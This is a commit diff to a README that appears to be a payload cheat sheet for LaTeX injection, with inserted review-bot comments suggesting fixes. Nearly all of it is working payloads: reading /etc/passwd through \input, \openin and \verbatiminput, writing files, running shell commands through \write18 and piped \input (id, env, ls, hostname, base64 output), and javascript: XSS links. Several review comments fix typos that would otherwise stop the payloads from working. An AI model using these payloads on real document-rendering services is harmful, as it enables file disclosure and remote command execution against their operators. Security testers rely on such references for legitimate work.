Update README.md

This commit is contained in:
Podalirius 2021-09-29 07:28:11 +02:00 committed by GitHub
parent 71988cfb40
commit 1865b8a85b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -2,14 +2,16 @@
## Read file
```bash
Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd}
\include{password} # load .tex file
\include{somefile} # load .tex file (somefile.tex)
```
Read single lined file
Read single lined file:
```bash
```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
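Review bot: the `# load .tex file` trailers on the two `\include` lines are not comments in TeX (`%` starts a comment; `#` is the macro-parameter character and will raise an error if the lines are pasted as-is), so either move the explanation into the prose or switch the trailers to `%`. Changing the fences from `bash` to `tex` is the right fix; the new sentence could also say why `\input{/etc/passwd}` and the two `\include{...}` examples differ, since `\include` appends `.tex` itself (as the `(somefile.tex)` remark shows) and forces a page break, while `\input` takes the path literally.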
@ -17,9 +19,9 @@ Read single lined file
\closein\file
```
Read multiple lined file
Read multiple lined file:
```bash
```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
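Review bot: style point on the heading line in this hunk: `Read single lined file:` should read `Read single-line file:` (and likewise `multiple lined` in the next hunk). The fence change from `bash` to `tex` is correct. Worth a one-line remark after the `\openin\file=/etc/issue` snippet: when the file cannot be opened, TeX raises no error and simply sets `\ifeof` true, so `\line` comes back empty, which explains the silent result a reader otherwise has to debug.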
@ -29,47 +31,52 @@ Read multiple lined file
\closein\file
```
Read text file, keep the formatting
Read text file, **without** interpreting the content, it will only paste raw file content:
```bash
```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
```bash
Write single lined file:
```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```
## Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash
\immediate\write18{env > output}
```tex
\immediate\write18{id > output}
\input{output}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash
```tex
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
```tex
\input|ls|base64
\input{|"/bin/hostname"}
```
## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
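Review bot: typo that breaks the base64 example in this hunk: the `\write18` line writes to `test.tex` but the next line reads `\input{text.tex}`, so the snippet fails with a missing-file error; make the two names match. Also `LaTex` in the sentence above it should be `LaTeX`. The `## Command execution` paragraph should state the precondition that both `\write18` and the `\input|...` piped form only work when shell escape is enabled in the TeX engine (TeX Live ships it restricted by default), since that setting is the first thing a reader will check and the control that stops this class of issue.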
@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
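Review bot: the two `Pwning coworkers thanks to LaTeX` lines in this hunk are byte-identical, so the only change here is presumably the newline at end of file; fine to keep, but a short mention in the commit message would save the next reader from puzzling over the diff.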